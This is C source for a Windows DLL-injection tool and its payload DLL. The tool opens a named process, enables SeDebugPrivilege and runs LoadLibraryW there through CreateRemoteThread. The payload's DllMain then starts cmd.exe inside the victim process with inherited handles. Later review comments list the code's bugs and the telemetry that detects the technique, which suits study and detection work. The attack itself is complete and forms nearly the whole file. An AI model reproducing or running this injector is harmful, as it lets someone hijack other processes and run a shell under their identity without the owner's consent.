// win2000 + vc6
#include<windows.h>
#include<process.h>
#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
#include<string.h>
#include<ctype.h>
#include<tlhelp32.h>
//--------------------------------------------
// File-scope state shared by main() and SetPrivilege(). All of it has
// static storage duration and is therefore zero-initialized at program
// start; main() relies on that for its `if(! hRemoteProcess)` test.
char lpszCurPath[MAX_PATH];        // current directory, later the full DLL path
char ProcName[MAX_PATH];           // lower-cased copy of one snapshot entry's image name
HANDLE hSnapshot;                  // Toolhelp32 process snapshot
PROCESSENTRY32 ProcEntry;          // current entry while walking the snapshot
DWORD RmtProcPid;                  // PID of the matched target process
HANDLE hRemoteProcess;             // target process handle; stays NULL when nothing matched
HANDLE hRemoteThread;              // thread created inside the target
HANDLE hProcessToken;              // this process's own access token
HANDLE hProcess;                   // not referenced anywhere in this translation unit
PROCESS_INFORMATION procinfo;      // not referenced anywhere in this translation unit
STARTUPINFO startinfo;             // not referenced anywhere in this translation unit
WCHAR * pwStr;                     // heap buffer holding the DLL path as UTF-16
int nLen;                          // byte count of the UTF-16 path, terminator included
PWSTR lpszRmt;                     // address of the path buffer inside the target process
PTHREAD_START_ROUTINE pfnAddr;     // address of kernel32!LoadLibraryW
int status,i;                      // generic Win32 BOOL result and loop index
FILE * fp;                         // used only to test that the DLL file exists
//--------------------------------------------
// Enables or disables one named privilege on a token; defined below main().
BOOL SetPrivilege(HANDLE, LPCTSTR, BOOL);
//--------------------------------------------
// Program entry point. Finds a running process by executable name and makes
// it load "Your_Dll.dll" from this program's current directory by starting a
// thread in it whose start routine is LoadLibraryW (CreateRemoteThread DLL
// injection).
//
// argv[1] is the target image name, compared case-insensitively. With any
// other argument count the program lists the running processes and quits.
//
// Every failure path calls exit(0), so the exit status never reports an
// error to the caller. `void main` is non-standard C (VC6 accepts it).
//
// Defender note: the call sequence OpenProcess(PROCESS_CREATE_THREAD |
// PROCESS_VM_OPERATION | PROCESS_VM_WRITE) -> VirtualAllocEx ->
// WriteProcessMemory -> CreateRemoteThread(LoadLibraryW) is the textbook
// injection pattern that EDR hooks and Sysmon Event 8 (CreateRemoteThread)
// exist to surface; the loaded DLL also appears in the target's module list.
void main(int argc, char * argv[])
{
printf("\n");
printf(" **********************************************\n");
printf(" * *\n");
printf(" * Process Inject (Personal) *\n");
printf(" * By abettor@mail.china.com *\n");
printf(" * QQ:41018203 *\n");
printf(" * *\n");
printf(" **********************************************\n");
printf("\n This program can help you to inject a thread to a remote process .\n");
printf("\n\tUsage : %s Name_Of_Process_To_Bind\n", argv[0]);
if(argc != 2)
{
// No target given: enumerate processes with Toolhelp32 and exit.
printf("\nPress any key to continue ...");
_getch();
printf("\n\nProcess list below :\n");
// Neither the snapshot handle (INVALID_HANDLE_VALUE on failure) nor the
// Process32First() result is checked; the loop prints whatever ProcEntry
// holds if either fails.
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,(ULONG)NULL);
ProcEntry.dwSize=sizeof(ProcEntry);
Process32First(hSnapshot,&ProcEntry);
do
{
printf("\t%s\n", ProcEntry.szExeFile);
}while(Process32Next(hSnapshot,&ProcEntry));
CloseHandle (hSnapshot);
printf("\nPress any key to quit ...");
_getch();
exit(0);
}
// Only proves the DLL exists in the current directory; the target process
// itself opens it later via LoadLibraryW.
fp=fopen("Your_Dll.dll", "rb");
if(! fp)
{
printf("\nLibrary file lost !\n");
exit(0);
}
fclose(fp);
// Lower-case argv[1] in place for the case-insensitive compare below.
// tolower() is given a plain char; for bytes >= 0x80 that is a negative
// value on VC6 (signed char), which <ctype.h> does not define.
i=0;
while(argv[1][i])
{
argv[1][i]=tolower(argv[1][i]);
++i;
}
// Walk the process list a second time looking for the named image.
// Snapshot and Process32First() results are again unchecked.
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,(ULONG)NULL);
ProcEntry.dwSize=sizeof(ProcEntry);
Process32First(hSnapshot,&ProcEntry);
do
{
// szExeFile and ProcName are both MAX_PATH, so this copy cannot overflow.
strcpy(ProcName, ProcEntry.szExeFile);
i=0;
while(ProcName[i])
{
ProcName[i]=tolower(ProcName[i]);
++i;
}
if( !strcmp(ProcName, argv[1]))
{
// First match wins; other processes with the same image name are ignored.
RmtProcPid = ProcEntry.th32ProcessID;
hRemoteProcess=OpenProcess(
PROCESS_QUERY_INFORMATION |
PROCESS_CREATE_THREAD |
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE,
FALSE,
RmtProcPid
);
break;
}
}while(Process32Next(hSnapshot,&ProcEntry));
CloseHandle (hSnapshot);
// hRemoteProcess is a zero-initialized global, so this single test covers
// both "no process matched" and "OpenProcess() failed".
if(! hRemoteProcess)
{
printf("\nProcess is not found or cannot be opened !\n");
exit(0);
}
// Build the absolute DLL path. GetCurrentDirectory() may fill up to
// MAX_PATH-1 characters and its result is not checked, so the strcat can
// write past the MAX_PATH buffer for a sufficiently long directory name.
GetCurrentDirectory(MAX_PATH, lpszCurPath);
strcat(lpszCurPath, "\\Your_Dll.dll");
// malloc(MAX_PATH) allocates MAX_PATH *bytes* (MAX_PATH/2 WCHARs), but the
// MultiByteToWideChar() call below is told the buffer holds MAX_PATH wide
// characters, so a long path can overrun the heap block. The malloc result
// is not checked and the buffer is never freed (the process exits anyway).
pwStr=(WCHAR *)malloc(MAX_PATH);
// Size of the UTF-16 string in bytes including the terminator, assuming
// each ANSI byte becomes exactly one UTF-16 code unit.
nLen=strlen(lpszCurPath);
nLen=(nLen + 1) * 2;
MultiByteToWideChar(CP_ACP, 0, lpszCurPath, -1, pwStr, MAX_PATH);
// TOKEN_ALL_ACCESS is far more than SetPrivilege() needs
// (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY would do).
status=OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken);
if(! status)
{
printf("\nOpenProcessToken() error !\n");
exit(0);
}
// Enables SeDebugPrivilege on this process's token. SetPrivilege() returns
// TRUE even when AdjustTokenPrivileges() did not actually grant it.
status=SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE);
if(! status)
{
printf("\nSetPrivilege() error !\n");
exit(0);
}
// LoadLibraryW is resolved in *this* process and the address is reused in
// the target; the code relies on kernel32 being mapped at the same base in
// both. Failure here exits silently with no message.
pfnAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
if(! pfnAddr) exit(0);
// Reserve nLen bytes of read/write memory in the target for the path.
lpszRmt=(PWSTR)VirtualAllocEx(hRemoteProcess, NULL, nLen, MEM_COMMIT, PAGE_READWRITE);
if(! lpszRmt)
{
printf("\nVirtualAllocEx() error !\n");
exit(0);
}
// Copy the UTF-16 path into the target; bytes-written count is not requested.
status=WriteProcessMemory(hRemoteProcess, lpszRmt, (LPVOID)pwStr, nLen, NULL);
if(! status)
{
printf("\nWriteProcessMemory() error !\n");
exit(0);
}
// The new thread runs LoadLibraryW(lpszRmt) inside the target. The thread
// is neither waited on nor closed, hRemoteProcess and hProcessToken are never
// closed, and the remote buffer is never freed; the program simply returns,
// so whether the load succeeded is never known to the user.
hRemoteThread=CreateRemoteThread( hRemoteProcess,
NULL,
0,
pfnAddr,
lpszRmt,
0,
NULL
);
if(! hRemoteThread)
{
printf("\nCreateRemoteThread() error !\n");
exit(0);
}
}
//------------------------------------------------------------
// Enables (bEnablePrivilege == TRUE) or disables a single named privilege
// such as SE_DEBUG_NAME on the access token hToken. Per the Win32 docs the
// token must have been opened with at least TOKEN_ADJUST_PRIVILEGES.
//
// Returns FALSE only when LookupPrivilegeValue() cannot resolve the name.
// NOTE(review): the AdjustTokenPrivileges() result is not checked, nor is
// GetLastError() for ERROR_NOT_ALL_ASSIGNED, so TRUE is returned even when
// the token does not hold the privilege and nothing was changed. A caller
// therefore cannot tell whether the privilege is really enabled.
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)
{
TOKEN_PRIVILEGES tp;
LUID luid;
// Resolve the privilege name on the local system (NULL system name).
if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid)) return FALSE;
// One privilege entry; TOKEN_PRIVILEGES has room for exactly one by default.
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
{
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
}
else
{
// Attributes 0 clears SE_PRIVILEGE_ENABLED, i.e. disables the privilege.
tp.Privileges[0].Attributes = 0;
}
// DisableAllPrivileges = FALSE; the previous state and its length are not
// requested, so nothing about the outcome is observable here.
AdjustTokenPrivileges( hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
return TRUE;
}
///////////// DLL code
Then build a second DLL:
// Your_Dll.dll
#include<stdio.h>
#include<stdlib.h>
#include<windows.h>
#include<process.h>
#define DLL_EXPORT __declspec(dllexport)
//---------------------------------------------------------
// File-scope state for the payload DLL. Static storage zero-initializes all
// of it, so startinfo.cb is 0 when DllMain() hands it to CreateProcess().
STARTUPINFO startinfo;            // passed to CreateProcess(); never filled in
PROCESS_INFORMATION procinfo;     // receives the child's handles; never closed
char lpCmd[MAX_PATH];             // "<system dir>\Cmd.exe"
//---------------------------------------------------------
// Entry point of the payload DLL. Because the EXE above loads this DLL via a
// remote LoadLibraryW thread, DLL_PROCESS_ATTACH runs inside the target
// process, under that process's identity and token.
//
// NOTE(review): Microsoft documents CreateProcess (and anything that loads
// or initializes other DLLs) as unsafe inside DllMain, which runs under the
// loader lock; a hang or deadlock of the host is possible.
// Defender note: the spawned cmd.exe has the injected process as its parent,
// the parent/child anomaly that process-creation telemetry (Sysmon Event 1,
// Security Event 4688) is designed to surface.
BOOL APIENTRY DllMain (HINSTANCE hInstance, DWORD dwReason, PVOID pvReserved)
{
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
// Build "<system dir>\Cmd.exe". The GetSystemDirectory() result is not
// checked, and strcat appends unconditionally into the MAX_PATH buffer.
GetSystemDirectory(lpCmd, MAX_PATH);
strcat(lpCmd, "\\Cmd.exe");
// startinfo is a zero-initialized global, so startinfo.cb is 0 rather than
// sizeof(STARTUPINFO) as the API documents. bInheritHandles is TRUE, so the
// child receives every inheritable handle of the host process. The return
// value is not checked and the handles placed in procinfo are never closed.
CreateProcess( lpCmd,
NULL,
NULL,
NULL,
TRUE,
0,
NULL,
NULL,
&startinfo,
&procinfo
);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
default:
// All other notifications are handled identically: nothing to do.
break;
}
return TRUE ;
}